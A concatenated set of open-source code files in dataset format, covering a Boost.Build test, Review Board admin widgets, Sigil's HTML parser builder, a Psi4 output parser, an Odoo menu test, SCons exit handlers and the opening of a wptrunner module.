t.write("b/jamfile.jam", "lib b : b.cpp ../a//a/<link>shared : <link>static ;")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Test that putting a library in sources of a searched library works.
t.write("jamfile.jam", """\
exe main : main.cpp png ;
lib png : z : <name>png ;
lib z : : <name>zzz ;
""")
t.run_build_system(["-a", "-d+2"], status=None, stderr=None)
# Try to find the "zzz" string either in response file (for Windows compilers),
# or in the standard output.
rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0]
if os.path.exists(rsp) and ( string.find(open(rsp).read(), "zzz") != -1 ):
pass
elif string.find(t.stdout(), "zzz") != -1:
pass
else:
t.fail_test(1)
# Test main -> libb -> liba chain in the case where liba is a file and not a
# Boost.Build target.
t.rm(".")
t.write("jamroot.jam", "")
t.write("a/jamfile.jam", """\
lib a : a.cpp ;
install dist : a ;
""")
t.write("a/a.cpp", """\
#if defined(_WIN32)
__declspec(dllexport)
#endif
void a() {}
""")
t.run_build_system(subdir="a")
t.expect_addition("a/dist/a.dll")
if ( os.name == 'nt' or os.uname()[0].lower().startswith('cygwin') ) and \
BoostBuild.get_toolset() != 'gcc':
# This is a Windows import library -- we know the exact name.
file = "a/dist/a.lib"
else:
file = t.adjust_names("a/dist/a.dll")[0]
t.write("b/jamfile.jam", "lib b : b.cpp ../%s ;" % file)
t.write("b/b.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void a();
#if defined(_WIN32)
__declspec(dllexport)
#endif
void b() { a(); }
""")
t.write("jamroot.jam", "exe main : main.cpp b//b ;")
t.write("main.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void b();
int main() { b(); }
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.cleanup()
| mit |
brennie/reviewboard | reviewboard/admin/widgets.py | 7 | 17971 | from __future__ import unicode_literals
import datetime
import logging
import re
import time
from django.core.cache import cache
from django.contrib.auth.models import User
from django.db.models.aggregates import Count
from django.db.models.signals import post_save, post_delete
from django.template.context import RequestContext
from django.template.loader import render_to_string
from django.utils import six, timezone
from django.utils.translation import ugettext_lazy as _
from djblets.cache.backend import cache_memoize
from reviewboard.admin.cache_stats import get_cache_stats
from reviewboard.attachments.models import FileAttachment
from reviewboard.changedescs.models import ChangeDescription
from reviewboard.diffviewer.models import DiffSet
from reviewboard.reviews.models import (ReviewRequest, Group,
Comment, Review, Screenshot,
ReviewRequestDraft)
from reviewboard.scmtools.models import Repository
DAYS_TOTAL = 30 # Set the number of days to display in date browsing widgets
NAME_TRANSFORM_RE = re.compile(r'([A-Z])')
primary_widgets = []
secondary_widgets = []
class Widget(object):
"""The base class for an Administration Dashboard widget.
Widgets appear in the Administration Dashboard and can display useful
information on the system, links to other pages, or even fetch data
from external sites.
There are a number of built-in widgets, but extensions can provide their
own.
"""
# Constants
SMALL = 'small'
LARGE = 'large'
# Configuration
widget_id = None
title = None
size = SMALL
template = None
actions = []
has_data = True
cache_data = True
def __init__(self):
"""Initialize the widget."""
self.data = None
self.name = NAME_TRANSFORM_RE.sub(
lambda m: '-%s' % m.group(1).lower(),
self.__class__.__name__)[1:]
def render(self, request):
"""Render the widget.
This will render the HTML for a widget. It takes care of generating
and caching the data, depending on the widget's needs.
"""
if self.has_data and self.data is None:
if self.cache_data:
self.data = cache_memoize(self.generate_cache_key(request),
lambda: self.generate_data(request))
else:
self.data = self.generate_data(request)
return render_to_string('admin/admin_widget.html',
RequestContext(request, {
'widget': self,
}))
def generate_data(self, request):
"""Generate data for the widget.
Widgets should override this to provide extra data to pass to the
template. This will be available in 'widget.data'.
If cache_data is True, this data will be cached for the day.
"""
return {}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data.
By default, the key takes into account the current day. If the
widget is displaying data specific to, for example, the current user, this should
be overridden to include that data in the key.
"""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
def get_sync_num():
"""Get the sync_num, which is number to sync.
sync_num is number of update and initialized to 1 every day.
"""
KEY = datetime.date.today()
cache.add(KEY, 1)
return cache.get(KEY)
def _increment_sync_num(*args, **kwargs):
"""Increment the sync_num."""
KEY = datetime.date.today()
if cache.get(KEY) is not None:
cache.incr(KEY)
class UserActivityWidget(Widget):
"""User activity widget.
Displays a pie chart of the active application users based on their last
login dates.
"""
widget_id = 'user-activity-widget'
title = _('User Activity')
size = Widget.LARGE
template = 'admin/widgets/w-user-activity.html'
actions = [
{
'url': 'db/auth/user/add/',
'label': _('Add'),
},
{
'url': 'db/auth/user/',
'label': _('Manage Users'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
now = timezone.now()
users = User.objects
week = datetime.timedelta(days=7)
day = datetime.timedelta(days=1)
month = datetime.timedelta(days=30)
two_months = datetime.timedelta(days=60)
three_months = datetime.timedelta(days=90)
one_day = (now - week, now + day)
seven_days = (now - month, now - week)
thirty_days = (now - two_months, now - month)
sixty_days = (now - three_months, now - two_months)
ninety_days = now - three_months
return {
'now': users.filter(last_login__range=one_day).count(),
'seven_days': users.filter(last_login__range=seven_days).count(),
'thirty_days': users.filter(last_login__range=thirty_days).count(),
'sixty_days': users.filter(last_login__range=sixty_days).count(),
'ninety_days': users.filter(last_login__lte=ninety_days).count(),
'total': users.count()
}
class ReviewRequestStatusesWidget(Widget):
"""Review request statuses widget.
Displays a pie chart showing review request by status.
"""
widget_id = 'review-request-statuses-widget'
title = _('Request Statuses')
template = 'admin/widgets/w-request-statuses.html'
def generate_data(self, request):
"""Generate data for the widget."""
public_requests = ReviewRequest.objects.filter(public=True)
return {
'draft': ReviewRequest.objects.filter(public=False).count(),
'pending': public_requests.filter(status="P").count(),
'discarded': public_requests.filter(status="D").count(),
'submit': public_requests.filter(status="S").count()
}
class RepositoriesWidget(Widget):
"""Shows a list of repositories in the system.
This widget displays a table with the most recent repositories,
their types, and visibility.
"""
MAX_REPOSITORIES = 3
widget_id = 'repositories-widget'
title = _('Repositories')
size = Widget.LARGE
template = 'admin/widgets/w-repositories.html'
actions = [
{
'url': 'db/scmtools/repository/add/',
'label': _('Add'),
},
{
'url': 'db/scmtools/repository/',
'label': _('View All'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
repos = Repository.objects.accessible(request.user).order_by('-id')
return {
'repositories': repos[:self.MAX_REPOSITORIES]
}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data."""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
class ReviewGroupsWidget(Widget):
"""Review groups widget.
Shows a list of recently created groups.
"""
MAX_GROUPS = 5
widget_id = 'review-groups-widget'
title = _('Review Groups')
template = 'admin/widgets/w-groups.html'
actions = [
{
'url': 'db/reviews/group/',
'label': _('View All'),
'classes': 'btn-right',
},
{
'url': 'db/reviews/group/add/',
'label': _('Add'),
},
]
def generate_data(self, request):
"""Generate data for the widget."""
return {
'groups': Group.objects.all().order_by('-id')[:self.MAX_GROUPS]
}
class ServerCacheWidget(Widget):
"""Cache statistics widget.
Displays a list of memcached statistics, if available.
"""
widget_id = 'server-cache-widget'
title = _('Server Cache')
template = 'admin/widgets/w-server-cache.html'
cache_data = False
def generate_data(self, request):
"""Generate data for the widget."""
uptime = {}
cache_stats = get_cache_stats()
if cache_stats:
for hosts, stats in cache_stats:
if stats['uptime'] > 86400:
uptime['value'] = stats['uptime'] / 60 / 60 / 24
uptime['unit'] = _("days")
elif stats['uptime'] > 3600:
uptime['value'] = stats['uptime'] / 60 / 60
uptime['unit'] = _("hours")
else:
uptime['value'] = stats['uptime'] / 60
uptime['unit'] = _("minutes")
return {
'cache_stats': cache_stats,
'uptime': uptime
}
class NewsWidget(Widget):
"""News widget.
Displays the latest news headlines from reviewboard.org.
"""
widget_id = 'news-widget'
title = _('Review Board News')
template = 'admin/widgets/w-news.html'
actions = [
{
'url': 'https://www.reviewboard.org/news/',
'label': _('More'),
},
{
'label': _('Reload'),
'id': 'reload-news',
},
]
has_data = False
class DatabaseStatsWidget(Widget):
"""Database statistics widget.
Displays a list of totals for several important database tables.
"""
widget_id = 'database-stats-widget'
title = _('Database Stats')
template = 'admin/widgets/w-stats.html'
def generate_data(self, request):
"""Generate data for the widget."""
return {
'count_comments': Comment.objects.all().count(),
'count_reviews': Review.objects.all().count(),
'count_attachments': FileAttachment.objects.all().count(),
'count_reviewdrafts': ReviewRequestDraft.objects.all().count(),
'count_screenshots': Screenshot.objects.all().count(),
'count_diffsets': DiffSet.objects.all().count()
}
class RecentActionsWidget(Widget):
"""Recent actions widget.
Displays a list of recent admin actions to the user.
"""
widget_id = 'recent-actions-widget'
title = _('Recent Actions')
template = 'admin/widgets/w-recent-actions.html'
has_data = False
def dynamic_activity_data(request):
"""Large database acitivity widget helper.
This method serves as a helper for the activity widget, it's used with for
AJAX requests based on date ranges passed to it.
"""
direction = request.GET.get('direction')
range_end = request.GET.get('range_end')
range_start = request.GET.get('range_start')
days_total = DAYS_TOTAL
# Convert the date from the request.
#
# This takes the date from the request in YYYY-MM-DD format and
# converts into a format suitable for QuerySet later on.
if range_end:
range_end = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_end, "%Y-%m-%d")))
if range_start:
range_start = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_start, "%Y-%m-%d")))
if direction == "next" and range_end:
new_range_start = range_end
new_range_end = \
new_range_start + datetime.timedelta(days=days_total)
elif direction == "prev" and range_start:
new_range_start = range_start - datetime.timedelta(days=days_total)
new_range_end = range_start
elif direction == "same" and range_start and range_end:
new_range_start = range_start
new_range_end = range_end
else:
new_range_end = datetime.datetime.now() + datetime.timedelta(days=1)
new_range_start = new_range_end - datetime.timedelta(days=days_total)
current_tz = timezone.get_current_timezone()
new_range_start = timezone.make_aware(new_range_start, current_tz)
new_range_end = timezone.make_aware(new_range_end, current_tz)
response_data = {
"range_start": new_range_start.strftime("%Y-%m-%d"),
"range_end": new_range_end.strftime("%Y-%m-%d")
}
def large_stats_data(range_start, range_end):
def get_objects(model_name, timestamp_field, date_field):
"""Perform timestamp based queries.
This method receives a dynamic model name and performs a filter
query. Later the results are grouped by day and prepared for the
charting library.
"""
args = '%s__range' % timestamp_field
q = model_name.objects.filter(**{
args: (range_start, range_end)
})
q = q.extra({timestamp_field: date_field})
q = q.values(timestamp_field)
q = q.annotate(created_count=Count('pk'))
q = q.order_by(timestamp_field)
data = []
for obj in q:
data.append([
time.mktime(time.strptime(
six.text_type(obj[timestamp_field]),
"%Y-%m-%d")) * 1000,
obj['created_count']
])
return data
comment_array = get_objects(Comment, "timestamp", "date(timestamp)")
change_desc_array = get_objects(ChangeDescription, "timestamp",
"date(timestamp)")
review_array = get_objects(Review, "timestamp", "date(timestamp)")
rr_array = get_objects(ReviewRequest, "time_added", "date(time_added)")
return {
'change_descriptions': change_desc_array,
'comments': comment_array,
'reviews': review_array,
'review_requests': rr_array
}
stats_data = large_stats_data(new_range_start, new_range_end)
return {
"range": response_data,
"activity_data": stats_data
}
class ActivityGraphWidget(Widget):
"""Detailed database statistics graph widget.
Shows the latest database activity for multiple models in the form of
a graph that can be navigated by date.
This widget shows a daily view of creation activity for a list of models.
All displayed widget data is computed on demand, rather than up-front
during creation of the widget.
"""
widget_id = 'activity-graph-widget'
title = _('Review Board Activity')
size = Widget.LARGE
template = 'admin/widgets/w-stats-large.html'
actions = [
{
'label': '<',
'id': 'db-stats-graph-prev',
'rel': 'prev',
},
{
'label': '>',
'id': 'db-stats-graph-next',
'rel': 'next',
},
{
'label': _('Reviews'),
'classes': 'btn-s btn-s-checked',
'rel': 'reviews',
},
{
'label': _('Comments'),
'classes': 'btn-s btn-s-checked',
'rel': 'comments',
},
{
'label': _('Review Requests'),
'classes': 'btn-s btn-s-checked',
'rel': 'review_requests',
},
{
'label': _('Changes'),
'classes': 'btn-s btn-s-checked',
'rel': 'change_descriptions',
},
]
has_data = False
def init_widgets():
"""Initialize the widgets subsystem.
This will listen for events in order to manage the widget caches.
"""
post_save.connect(_increment_sync_num, sender=Group)
post_save.connect(_increment_sync_num, sender=Repository)
post_delete.connect(_increment_sync_num, sender=Group)
post_delete.connect(_increment_sync_num, sender=Repository)
def register_admin_widget(widget_cls, primary=False):
"""Register an administration widget.
This widget will appear in the list of primary or secondary widgets.
The widget class must have a widget_id attribute set, and can only
be registered once in a single list. A KeyError will be thrown if
attempting to register a second time.
"""
widget_id = widget_cls.widget_id
if not widget_id:
raise ValueError('The widget_id attribute must be set on %r'
% widget_cls)
if widget_cls in primary_widgets or widget_cls in secondary_widgets:
raise KeyError('"%s" is already a registered administration widget'
% widget_id)
if primary:
primary_widgets.append(widget_cls)
else:
secondary_widgets.append(widget_cls)
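# Illustrative sketch (not part of Review Board): the kind of widget an extension
# might define and register. The widget_id, title, and template path below are
# hypothetical examples, not real Review Board resources.
class ExampleLinksWidget(Widget):
    """Example widget that only renders a static template of useful links."""
    widget_id = 'example-links-widget'
    title = _('Example Links')
    template = 'admin/widgets/w-example-links.html'
    has_data = False
# An extension would then register it during its own initialization, e.g.:
#
#     register_admin_widget(ExampleLinksWidget)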
def unregister_admin_widget(widget_cls):
"""Unregister a previously registered administration widget."""
widget_id = widget_cls.widget_id
try:
primary_widgets.remove(widget_cls)
except ValueError:
try:
secondary_widgets.remove(widget_cls)
except ValueError:
logging.error('Failed to unregister unknown administration '
'widget "%s".',
widget_id)
raise KeyError('"%s" is not a registered administration widget'
% widget_id)
# Register the built-in widgets
register_admin_widget(ActivityGraphWidget, True)
register_admin_widget(RepositoriesWidget, True)
register_admin_widget(UserActivityWidget, True)
register_admin_widget(ReviewRequestStatusesWidget)
register_admin_widget(RecentActionsWidget)
register_admin_widget(ReviewGroupsWidget)
register_admin_widget(ServerCacheWidget)
register_admin_widget(NewsWidget)
register_admin_widget(DatabaseStatsWidget)
| mit |
eli-schwartz/Sigil | src/Resource_Files/plugin_launchers/python/sigil_bs4/builder/_htmlparser.py | 6 | 9793 | from __future__ import unicode_literals, division, absolute_import, print_function
import sys
PY3 = sys.version_info[0] == 3
if PY3:
text_type = str
binary_type = bytes
unicode = str
basestring = str
else:
range = xrange
text_type = unicode
binary_type = str
chr = unichr
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
if PY3:
from html.parser import HTMLParser
try:
from html.parser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
else:
from HTMLParser import HTMLParser
try:
from HTMLParser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
from sigil_bs4.element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from sigil_bs4.dammit import EntitySubstitution, UnicodeDammit
from sigil_bs4.builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
attr_dict = {}
for key, value in attrs:
# Change None attribute values to the empty string
# for consistency with the other tree builders.
if value is None:
value = ''
attr_dict[key] = value
attrvalue = '""'
self.soup.handle_starttag(name, None, None, attr_dict)
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed in all supported versions.
# http://bugs.python.org/issue13633
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
elif name.startswith('X'):
real_name = int(name.lstrip('X'), 16)
else:
real_name = int(name)
try:
data = chr(real_name)
except (ValueError, OverflowError) as e:
data = "\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
elif data == 'DOCTYPE':
# i.e. "<!DOCTYPE>"
data = ''
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
picklable = True
NAME = HTMLPARSER
features = [NAME, HTML, STRICT]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
kwargs['strict'] = False
if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
kwargs['convert_charrefs'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None, exclude_encodings=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
yield (markup, None, None, False)
return
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True,
exclude_encodings=exclude_encodings)
yield (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError as e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
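# Illustrative only (not part of sigil_bs4): this builder is normally selected by
# passing the "html.parser" feature name to BeautifulSoup. The import path below
# is assumed from this repository's package layout.
def _example_parse(markup="<p>Hello<p>World"):
    from sigil_bs4 import BeautifulSoup
    return BeautifulSoup(markup, "html.parser")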
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
| gpl-3.0 |
susilehtola/psi4 | psi4/driver/procrouting/findif_response_utils/data_collection_helper.py | 6 | 4102 | #
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module of helper functions for distributed ccresponse computations.
Defines functions for retrieving data computed at displaced geometries.
"""
from psi4.driver import p4util
def collect_displaced_matrix_data(db, signature, row_dim):
"""
Gathers a list of tensors, one at each displaced geometry.
db: (database) the database object for this property calculation
signature: (string) The string that notifies the matrix reader that the
targeted tensor data begins.
row_dim: the expected number of rows that this value should be printed
across in the file
Returns a 2d list result[i][j]:
i: indexes displacements
j: indexes elements of the flattened tensor at some displacement
Throws: none
"""
result = []
for job in db['job_status']:
with open('{}/output.dat'.format(job)) as outfile:
result.append(parse_geometry_matrix_data(outfile, signature, row_dim))
return result
# END collect_displaced_matrix_data()
def parse_geometry_matrix_data(outfile, matrix_name, row_tot):
"""
Parses data from a 3 by n matrix printed to a file
outfile: ( file ) handle open in read mode, where the data should be found
matrix_name: ( string ) that indicates the matrix data is found on the lines
below
row_tot: ( int ) indicates the number of lines that the matrix data should
be printed across in the file
Returns: matrix_data a list of matrix elements, len = 3*row_tot
Throws: ParsingError (Collecting matrix data failed) if
it can't find matrix_name in the file,
it found matrix_name but no data, or
it found matrix_name and data but the number of elements is
incorrect.
"""
collect_matrix = False
n_rows = 0
n_tries = 0
matrix_data = []
for line in outfile:
if matrix_name in line:
collect_matrix = True
if collect_matrix and (n_rows < row_tot):
try:
n_tries += 1
if n_tries > (row_tot + 13):
raise p4util.ParsingError('{} Matrix was unreadable. Scanned {}'
' lines.'.format(matrix_name, n_tries))
else:
(index, x, y, z) = line.split()
matrix_data.append(float(x))
matrix_data.append(float(y))
matrix_data.append(float(z))
n_rows += 1
except:
pass
if (n_rows == row_tot) and (len(matrix_data) != 3 * row_tot):
raise p4util.ParsingError('Collecting {} data failed!'
'\nExpected {} elements but only captured {}'.format(
matrix_name, 3 * row_tot, len(matrix_data)))
if len(matrix_data) == 3 * row_tot:
return matrix_data
raise p4util.ParsingError('data for {} was not found in the output file, '
'but it was marked for collection. Check output files '
'in displacement sub-dirs!'.format(matrix_name))
# END parse_geometry_matrix_data()
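# Illustrative sketch (not part of Psi4): feeding a fabricated output snippet to
# parse_geometry_matrix_data(). The signature line and values are invented purely
# to show the expected layout (a signature line followed by "index x y z" rows).
if __name__ == '__main__':
    import io
    fake_output = io.StringIO(
        "Some Example Tensor\n"
        "  1   0.0   0.1   0.2\n"
        "  2   1.0   1.1   1.2\n"
    )
    # Prints the six floats above, flattened row by row.
    print(parse_geometry_matrix_data(fake_output, "Some Example Tensor", 2))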
| lgpl-3.0 |
wangjun/odoo | openerp/addons/base/tests/test_menu.py | 501 | 1450 | import openerp.tests.common as common
class test_menu(common.TransactionCase):
def setUp(self):
super(test_menu,self).setUp()
self.Menus = self.registry('ir.ui.menu')
def test_00_menu_deletion(self):
"""Verify that menu deletion works properly when there are child menus, and those
are indeed made orphans"""
cr, uid, Menus = self.cr, self.uid, self.Menus
# Generic trick necessary for search() calls to avoid hidden menus
ctx = {'ir.ui.menu.full_list': True}
root_id = Menus.create(cr, uid, {'name': 'Test root'})
child1_id = Menus.create(cr, uid, {'name': 'Test child 1', 'parent_id': root_id})
child2_id = Menus.create(cr, uid, {'name': 'Test child 2', 'parent_id': root_id})
child21_id = Menus.create(cr, uid, {'name': 'Test child 2-1', 'parent_id': child2_id})
all_ids = [root_id, child1_id, child2_id, child21_id]
# delete and check that direct children are promoted to top-level
# cfr. explanation in menu.unlink()
Menus.unlink(cr, uid, [root_id])
remaining_ids = Menus.search(cr, uid, [('id', 'in', all_ids)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id, child21_id], remaining_ids)
orphan_ids = Menus.search(cr, uid, [('id', 'in', all_ids), ('parent_id', '=', False)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id], orphan_ids)
| agpl-3.0 |
angad/libjingle-mac | scons-2.2.0/engine/SCons/exitfuncs.py | 14 | 2436 | """SCons.exitfuncs
Register functions which are executed when SCons exits for any reason.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/exitfuncs.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
_exithandlers = []
def _run_exitfuncs():
"""run any registered exit functions
_exithandlers is traversed in reverse order so functions are executed
last in, first out.
"""
while _exithandlers:
func, targs, kargs = _exithandlers.pop()
func(*targs, **kargs)
def register(func, *targs, **kargs):
"""register a function to be executed upon normal program termination
func - function to be called at exit
targs - optional arguments to pass to func
kargs - optional keyword arguments to pass to func
"""
_exithandlers.append((func, targs, kargs))
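# Illustrative sketch (not part of SCons): registering a cleanup handler. The
# temporary-directory path is an invented example.
def _example_register_cleanup(tmpdir="/tmp/scons-example-build"):
    import shutil
    # shutil.rmtree(tmpdir, ignore_errors=True) will run when SCons exits,
    # last in, first out relative to other registered handlers.
    register(shutil.rmtree, tmpdir, ignore_errors=True)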
import sys
try:
x = sys.exitfunc
# if x isn't our own exit func executive, assume it's another
# registered exit function - append it to our list...
if x != _run_exitfuncs:
register(x)
except AttributeError:
pass
# make our exit function get run by python when it exits:
sys.exitfunc = _run_exitfuncs
del sys
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| bsd-3-clause |
gpoesia/servo | tests/wpt/harness/wptrunner/manifestupdate.py | 116 | 17251 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import urlparse
from collections import namedtuple, defaultdict
from wptmanifest.node import (DataNode, ConditionalNode, BinaryExpressionNode,
BinaryOperatorNode, VariableNode, StringNode, NumberNode,
UnaryExpressionNode, UnaryOperatorNode, KeyValueNode)
from wptmanifest.backends import conditional
from wptmanifest.backends.conditional import ManifestItem
import expected
"""Manifest structure used to update the expected results of a test
Each manifest file is represented by an ExpectedManifest that has one
or more TestNode children, one per test in the manifest. Each
TestNode has zero or more SubtestNode children, one for each known
subtest of the test.
In these representations, conditionals expressions in the manifest are
